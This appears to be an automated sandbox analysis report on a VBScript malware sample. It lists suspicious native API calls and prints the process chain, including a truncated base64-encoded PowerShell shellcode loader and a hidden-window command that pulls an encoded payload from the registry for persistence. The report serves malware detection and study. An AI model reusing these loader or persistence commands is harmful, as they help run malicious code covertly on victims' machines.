Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08287A48 26_2_08287A48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0828E2F8 26_2_0828E2F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_082834F8 26_2_082834F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0828B9E8 26_2_0828B9E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0828C478 26_2_0828C478
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0828DCC8 26_2_0828DCC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_082B1F42 26_2_082B1F42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_082B1F50 26_2_082B1F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_082B0FA8 26_2_082B0FA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_082B0448 26_2_082B0448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_082B34E8 26_2_082B34E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_082B34F8 26_2_082B34F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_084566A8 26_2_084566A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08451808 26_2_08451808
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08451C50 26_2_08451C50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08455580 26_2_08455580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08452F98 26_2_08452F98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_084B6078 26_2_084B6078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_084BF4C0 26_2_084BF4C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_084B6078 26_2_084B6078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_084C0040 26_2_084C0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_084C6168 26_2_084C6168
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_084C2D48 26_2_084C2D48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_084C2720 26_2_084C2720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088891C0 26_2_088891C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0888E928 26_2_0888E928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08887C08 26_2_08887C08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0888A408 26_2_0888A408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088833D1 26_2_088833D1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08883420 26_2_08883420
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088ACD7B 26_2_088ACD7B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088AEE40 26_2_088AEE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088AE312 26_2_088AE312
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088AD5E0 26_2_088AD5E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088A6C70 26_2_088A6C70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088AEFE9 26_2_088AEFE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_088A94C0 26_2_088A94C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08928FF8 26_2_08928FF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08920040 26_2_08920040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08926400 26_2_08926400
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08925508 26_2_08925508
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0892A660 26_2_0892A660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08928CA0 26_2_08928CA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0892A660 26_2_0892A660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0896A484 26_2_0896A484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_0896FED0 26_2_0896FED0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089DE0E0 26_2_089DE0E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089D5808 26_2_089D5808
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089DD860 26_2_089DD860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089D8998 26_2_089D8998
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089DC9A8 26_2_089DC9A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089DAAA8 26_2_089DAAA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089D82E8 26_2_089D82E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089D7358 26_2_089D7358
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089DEDA0 26_2_089DEDA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089D46D7 26_2_089D46D7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089D46E8 26_2_089D46E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089DBE68 26_2_089DBE68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08C2A2B0 26_2_08C2A2B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08C2DB71 26_2_08C2DB71
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08C294E0 26_2_08C294E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08C24FB9 26_2_08C24FB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08C2BF10 26_2_08C2BF10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08C29BC2 26_2_08C29BC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08C24FB9 26_2_08C24FB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_089D0081 26_2_089D0081
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 26_2_08922AF0 26_2_08922AF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_0309520F 30_2_0309520F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03092530 30_2_03092530
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_0309495D 30_2_0309495D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03090775 30_2_03090775
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030909B3 30_2_030909B3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03091DE5 30_2_03091DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03091B0A 30_2_03091B0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03092B04 30_2_03092B04
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03092A12 30_2_03092A12
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_0309543B 30_2_0309543B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03092D3D 30_2_03092D3D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_0309278F 30_2_0309278F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03094883 30_2_03094883
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03094F82 30_2_03094F82
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030957A5 30_2_030957A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030958C2 30_2_030958C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030958C5 30_2_030958C5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03093CFF 30_2_03093CFF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03232530 33_2_03232530
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_0323520F 33_2_0323520F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03230775 33_2_03230775
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_0323495D 33_2_0323495D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032309B3 33_2_032309B3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03231DE5 33_2_03231DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_0323543B 33_2_0323543B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03232D3D 33_2_03232D3D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03232B04 33_2_03232B04
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03231B0A 33_2_03231B0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03232A12 33_2_03232A12
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032357A5 33_2_032357A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03234883 33_2_03234883
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03234F82 33_2_03234F82
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_0323278F 33_2_0323278F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03233CFF 33_2_03233CFF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032358C2 33_2_032358C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032358C5 33_2_032358C5
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: String function: 085E27B8 appears 40 times
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_2_00A56511 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 17_2_00A56511
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_2_00A5657A NtProtectVirtualMemory, 17_2_00A5657A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 17_2_00A56575 NtProtectVirtualMemory, 17_2_00A56575
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC62B5 NtSetContextThread, 25_2_08FC62B5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_08FC2D3D NtWriteVirtualMemory, 25_2_08FC2D3D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_0309520F NtAllocateVirtualMemory, 30_2_0309520F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_0309657A NtProtectVirtualMemory, 30_2_0309657A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_030928EC RtlAddVectoredExceptionHandler,NtProtectVirtualMemory, 30_2_030928EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03091DE5 NtSetInformationProcess, 30_2_03091DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03095EF7 NtProtectVirtualMemory, 30_2_03095EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 30_2_03096575 NtProtectVirtualMemory, 30_2_03096575
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_0323520F NtAllocateVirtualMemory, 33_2_0323520F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_0323657A NtProtectVirtualMemory, 33_2_0323657A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03231DE5 NtSetInformationProcess, 33_2_03231DE5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_032328EC RtlAddVectoredExceptionHandler,NtProtectVirtualMemory, 33_2_032328EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03235EF7 NtProtectVirtualMemory, 33_2_03235EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 33_2_03236575 NtProtectVirtualMemory, 33_2_03236575
Java / VBScript file with very long strings (likely obfuscated code)
Source: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rf0jcwxf.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0A3.tmp" "c:\Users\user\AppData\Local\Temp\CSC1F7F6E38280547C88EA9F93164256468.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $OBITUARY=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Billiond5;powershell.exe -windowstyle hidden -encodedcommand($OBITUARY)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAE